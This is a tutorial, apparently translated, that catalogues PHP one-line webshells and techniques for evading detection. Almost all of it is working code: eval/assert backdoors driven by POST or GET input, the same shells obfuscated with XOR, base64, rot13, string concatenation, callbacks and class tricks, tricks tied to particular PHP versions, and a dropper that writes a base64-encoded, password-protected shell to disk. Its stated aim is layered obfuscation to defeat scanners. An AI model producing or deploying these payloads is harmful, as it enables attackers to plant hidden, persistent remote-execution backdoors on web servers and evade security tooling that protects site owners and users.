Mastering PHP One‑Line Webshell Evasion: Techniques & Payloads

0X00 Simple One‑Line PHP Webshell (Applicable to CTFs and Small Sites)

<?php eval($_POST['a']); ?>
// Function substitution
<?php assert($_POST['a']); ?>

<?php @eval($_POST['110']);?>

adds an @ to suppress errors; the @ can be placed before eval or before the POST variable.

Replacing eval with assert changes behavior: eval() executes a string as PHP code (must end with a semicolon), while assert() evaluates an expression and executes it only if it returns true.

eval(): evaluates a string as code; the string must be valid PHP and end with a semicolon.

assert(): evaluates an expression; if true, the expression is executed, otherwise an error is raised.

Using assert can replace eval to reduce sensitivity, but many other sensitive functions (e.g., system, post, get) exist, so obfuscation and encryption are common evasion methods.

One‑line PHP webshells can also execute commands via POST or GET, e.g.,

<pre> <body><? @system($_GET["calc"]); ?></body> </pre>

.

0X01 PHP Evasion (String Evasion Techniques)

String XOR encryption String base family encryption String rot13 encryption String concatenation

PHP XOR Evasion

Many developers block sensitive functions via blacklists, but attackers can use encryption to bypass them. XOR (^) converts strings to binary, applies XOR, then converts back to a string.

<?php<br/>$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');<br/>$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');<br/>$___=$$__;<br/>$_($___[_]);<br/>?>

<?php<br/>$_++;<br/>$__ = ('`' ^ '?') . (':' ^ '}') . ('%' ^ '`') . ('{' ^ '/');<br/>$___ = ('$' ^ '{') . ('~' ^ '.') . ('/' ^ '`') . ('-' ^ '~') . ('(' ^ '|');<br/>('%05'^'`')<br/>${$__}[!$_](${$___}[$_]);<br/>?>

<?php<br/>$__=('>'>'<')+('>'>'<');<br/>$_=$__/$__;<br/>$____='';<br/>$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});<br/>$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});<br/>$_=$$_____;<br/>$____($_[$__]);<br/>?>

PHP XOR scripts can generate functions dynamically.

<?php<br/>    $test = '~!@#$%^&*()_+\|/?.,-={}[]';<br/>    for($i=0;$i<strlen($test);$i++) {<br/>        for($j=0;$j<strlen($test);$j++) {<br/>            if(ord($test[$i]^$test[$j])>64 && ord($test[$i]^$test[$j])<91) {<br/>                echo $test[$i].'^'.$test[$j].'结果为:';<br/>                echo $test[$i]^$test[$j];<br/>                echo '<br>';<br/>            } else if(ord($test[$i]^$test[$j])>97 && ord($test[$i]^$test[$j])<122) {<br/>                echo $test[$i].'^'.$test[$j].'结果为:';<br/>                echo $test[$i]^$test[$j];<br/>                echo '<br>';<br/>            }<br/>        }<br/>    }<br/>?>

PHP Base Family Encryption

<?php<br/>$a = 'd2hvYW1p';<br/>echo base64_decode($a);<br/>?>

Base16 or Base32 can be combined with other methods for better evasion.

PHP rot13 Encryption

<?php<br/>$a=str_rot13('riny');<br/>$a($_POST['110']);<br/>?>

rot13 encrypts eval as riny, helping bypass regex filters.

<?php<br/>class A{<br/>function xxx($a){<br/>$b=str_rot13('!r!i!n!y!!');<br/>$str=explode('!',$b)[5];<br/>$str($a);}<br/>}<br/>$c=new A();<br/>$c->xxx($_REQUEST['110']);<br/>?>

PHP Concatenation Evasion

<?php $k="e"."v"."a"."l"; $k($_{"_PO"."ST"}['110']);?>

Splitting sensitive functions and reassembling them can evade detection.

<?php<br/>$a = substr_replace("xxser","asser",-3);<br/>$b = array('', $a);<br/>$c = $b[1].chr('116');<br/>$fun=preg_replace("/xx/", "", $c);<br/>$d = substr_replace("", $fun,0);<br/>$d($_POST['110']);<br/>?>

PHP Obfuscation Evasion

<?php <br/>function a() { return "/*110110110110*/".$_POST['110']."/*110110110110**/"; } <br/>@eval(a()); <br/>?>

<?php $a = str_replace(x,"","xexaxvxlx"); $a(@$_POST["110"]); ?>

0X02 PHP Evasion (Function Feature Evasion)

Function replacement Custom function bypass Deformed callbacks Array tricks Variable variables

Function Replacement

Common replaceable functions include array_map, array_filter, array_reduce, array_diff_uassoc, array_udiff, array_udiff_uassoc, array_intersect_assoc, array_uintersect, array_uintersect_uassoc, xml_set_character_data_handler, xml_set_default_handler, xml_set_external_entity_ref_handler, xml_set_notation_decl_handler, xml_set_unparsed_entity_decl_handler, etc.

Custom Function Bypass (Case‑Insensitive)

<?php <br/>function aaa($a){ return $a; }<br/>function bbb($b){ return eval($b); }<br/>function post(){ return @$_POST['110']; }<br/>function run(){ return aaa(bbb)(aaa(post)()); }<br/>aaa(bbb)(aaa(post)());<br/>?>

PHP function names are case‑insensitive; using different cases can help bypass filters.

Callback Combination Bypass

array_walk()<br/>array_map()<br/>filter_var()<br/>filter_var_array()<br/>uasort()<br/>uksort()

These functions often need additional obfuscation to avoid detection.

Array Bypass

<?php<br/>$a = substr_replace("evxx","al",2);<br/>$b = array($arrayName = ($arrayName =($arrayName = array('a' => $b($_POST['110'])))));<br/>?>

Variable Variables

<?php <br/>$zeo='miansha';<br/>$$zeo=$_POST['110'];<br/>eval($miansha);<br/>?>

Class‑Based Evasion

<?php <br/>class zeo2 { public $b=''; function post(){ return $_POST['x']; } }<br/>class zeo extends zeo2 { public $code=null; function __construct(){ $code=parent::post(); assert($code); } }<br/>$blll = new zeo;<br/>$bzzz = new zeo2;<br/>?>

0X03 PHP Evasion (Version‑Specific Techniques)

1. Special Symbols to Trigger Errors

<?php \echo 'whoami'; ?>

Works only on PHP 5.2; using unusual whitespace or null characters can confuse signature‑based detection.

2. Hexadecimal Strings

<?php $s=substr("aabbccsystem","0x6"); $s(whoami); ?>

Effective on PHP 5.3/5.5; PHP 7 treats the string as non‑numeric.

3. Syntax Without Newlines (PHP 7.3.4)

<?php<br/>$a = $_GET['function'] ?? 'whoami';<br/>$b = $_GET['cmd'] ?? 'whoami';<br/>$a(null.(null.$b));<br/>?>

The null‑coalescing operator (??) works only on PHP 7.0+; using it on older versions causes errors.

0X04 PHP One‑Line Evasion Examples

<?php <br/>$file="shell.php";<br/>$shell="PD9waHAKJGEgPSBzdWJzdHJfcmVwbGFjZSgieHhzZXIiLCJhc3NlciIsLTMpOwokYiA9IGFycmF5KCcnLCRhKTsKJGMgPSAkYlsxXS5jaHIoJzExNicpOwokZnVuPXByZWdfcmVwbGFjZSgiL3h4LyIsIiIsJGMpOwokZCA9IHN1YnN0cl9yZXBsYWNlKCIiLCRmdW4sMCk7CiRkICgkX1BPU1RbJzExMCddKTsKPz4=";<br/>file_put_contents($file,base64_decode($shell));<br/>?>
// password 110

<?php<br/>ini_set("display_errors",1);<br/>$objPQ = new SplPriorityQueue();<br/>$objPQ->insert('m',1);<br/>$objPQ->insert('s',6);<br/>$objPQ->insert('e',3);<br/>$objPQ->insert('s',4);<br/>$objPQ->insert('y',5);<br/>$objPQ->insert('t',$_GET[a]);<br/>$objPQ->setExtractFlags(SplPriorityQueue::EXTR_DATA);<br/>$objPQ->top();<br/>$m='';<br/>$cur = new ErrorException($_GET[b]);<br/>while($objPQ->valid()){ $m.=$objPQ->current(); $objPQ->next(); }<br/>echo $m($cur->getMessage());<br/>?>
// key 3

0X04 One‑Line Evasion Summary

This article aims to give readers a solid understanding of one‑line PHP webshell evasion techniques; as detection becomes more aggressive, creative thinking and layered obfuscation are essential.